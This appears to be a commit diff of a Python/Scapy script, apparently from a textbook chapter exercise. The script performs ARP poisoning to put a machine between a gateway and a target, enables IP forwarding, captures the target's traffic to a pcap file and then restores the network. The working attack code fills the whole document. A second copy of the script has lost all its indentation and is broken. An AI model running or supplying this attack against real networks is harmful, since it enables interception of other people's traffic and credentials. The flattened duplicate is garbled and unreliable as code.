dragonken · March 9, 2019 22:33
diff --git a/ch4_arp_poison.py b/ch4_arp_poison.py
 from scapy.all import *
 import os
 import signal
 import sys
 import threading
 import time

 #ARP Poison parameters
 gateway_ip = "10.0.0.1"
 target_ip = "10.0.0.250"
 packet_count = 1000
 conf.iface = "en5"
 conf.verb = 0

 #Given an IP, get the MAC. Broadcast ARP Request for a IP Address. Should recieve
 #an ARP reply with MAC Address
 def get_mac(ip_address):
    #ARP request is constructed. sr function is used to send/ receive a layer 3 packet
    #Alternative Method using Layer 2: resp, unans =  srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip_address))
    resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10)
    for s,r in resp:
        return r[ARP].hwsrc
    return None

 #Restore the network by reversing the ARP poison attack. Broadcast ARP Reply with
 #correct MAC and IP Address information
 def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
    send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5)
    send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5)
    print("[*] Disabling IP forwarding")
    #Disable IP Forwarding on a mac
    os.system("sysctl -w net.inet.ip.forwarding=0")
    #kill process on a mac
    os.kill(os.getpid(), signal.SIGTERM)

 #Keep sending false ARP replies to put our machine in the middle to intercept packets
 #This will use our interface MAC address as the hwsrc for the ARP reply
 def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
    print("[*] Started ARP poison attack [CTRL-C to stop]")
    try:
        while True:
            send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip))
            send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip))
            time.sleep(2)
    except KeyboardInterrupt:
        print("[*] Stopped ARP poison attack. Restoring network")
        restore_network(gateway_ip, gateway_mac, target_ip, target_mac)

 #Start the script
 print("[*] Starting script: arp_poison.py")
 print("[*] Enabling IP forwarding")
 #Enable IP Forwarding on a mac
 os.system("sysctl -w net.inet.ip.forwarding=1")
 print(f"[*] Gateway IP address: {gateway_ip}")
 print(f"[*] Target IP address: {target_ip}")

 gateway_mac = get_mac(gateway_ip)
 if gateway_mac is None:
    print("[!] Unable to get gateway MAC address. Exiting..")
    sys.exit(0)
 else:
    print(f"[*] Gateway MAC address: {gateway_mac}")

 target_mac = get_mac(target_ip)
 if target_mac is None:
    print("[!] Unable to get target MAC address. Exiting..")
    sys.exit(0)
 else:
    print(f"[*] Target MAC address: {target_mac}")

 #ARP poison thread
 poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
 poison_thread.start()

 #Sniff traffic and write to file. Capture is filtered on target machine
 try:
    sniff_filter = "ip host " + target_ip
    print(f"[*] Starting network capture. Packet Count: {packet_count}. Filter: {sniff_filter}")
    packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count)
    wrpcap(target_ip + "_capture.pcap", packets)
    print(f"[*] Stopping network capture..Restoring network")
    restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
 except KeyboardInterrupt:
    print(f"[*] Stopping network capture..Restoring network")
    restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)
	from scapy.all import *
	import os
	import signal
	import sys
	import threading
	import time

	#ARP Poison parameters
	gateway_ip = "10.0.0.1"
	target_ip = "10.0.0.250"
	packet_count = 1000
	conf.iface = "en5"
	conf.verb = 0

	#Given an IP, get the MAC. Broadcast ARP Request for a IP Address. Should recieve
	#an ARP reply with MAC Address
	def get_mac(ip_address):
	#ARP request is constructed. sr function is used to send/ receive a layer 3 packet
	#Alternative Method using Layer 2: resp, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip_address))
	resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10)
	for s,r in resp:
	return r[ARP].hwsrc
	return None

	#Restore the network by reversing the ARP poison attack. Broadcast ARP Reply with
	#correct MAC and IP Address information
	def restore_network(gateway_ip, gateway_mac, target_ip, target_mac):
	send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5)
	send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5)
	print("[*] Disabling IP forwarding")
	#Disable IP Forwarding on a mac
	os.system("sysctl -w net.inet.ip.forwarding=0")
	#kill process on a mac
	os.kill(os.getpid(), signal.SIGTERM)

	#Keep sending false ARP replies to put our machine in the middle to intercept packets
	#This will use our interface MAC address as the hwsrc for the ARP reply
	def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac):
	print("[*] Started ARP poison attack [CTRL-C to stop]")
	try:
	while True:
	send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip))
	send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip))
	time.sleep(2)
	except KeyboardInterrupt:
	print("[*] Stopped ARP poison attack. Restoring network")
	restore_network(gateway_ip, gateway_mac, target_ip, target_mac)

	#Start the script
	print("[*] Starting script: arp_poison.py")
	print("[*] Enabling IP forwarding")
	#Enable IP Forwarding on a mac
	os.system("sysctl -w net.inet.ip.forwarding=1")
	print(f"[*] Gateway IP address: {gateway_ip}")
	print(f"[*] Target IP address: {target_ip}")

	gateway_mac = get_mac(gateway_ip)
	if gateway_mac is None:
	print("[!] Unable to get gateway MAC address. Exiting..")
	sys.exit(0)
	else:
	print(f"[*] Gateway MAC address: {gateway_mac}")

	target_mac = get_mac(target_ip)
	if target_mac is None:
	print("[!] Unable to get target MAC address. Exiting..")
	sys.exit(0)
	else:
	print(f"[*] Target MAC address: {target_mac}")

	#ARP poison thread
	poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac))
	poison_thread.start()

	#Sniff traffic and write to file. Capture is filtered on target machine
	try:
	sniff_filter = "ip host " + target_ip
	print(f"[*] Starting network capture. Packet Count: {packet_count}. Filter: {sniff_filter}")
	packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count)
	wrpcap(target_ip + "_capture.pcap", packets)
	print(f"[*] Stopping network capture..Restoring network")
	restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
	except KeyboardInterrupt:
	print(f"[*] Stopping network capture..Restoring network")
	restore_network(gateway_ip, gateway_mac, target_ip, target_mac)
	sys.exit(0)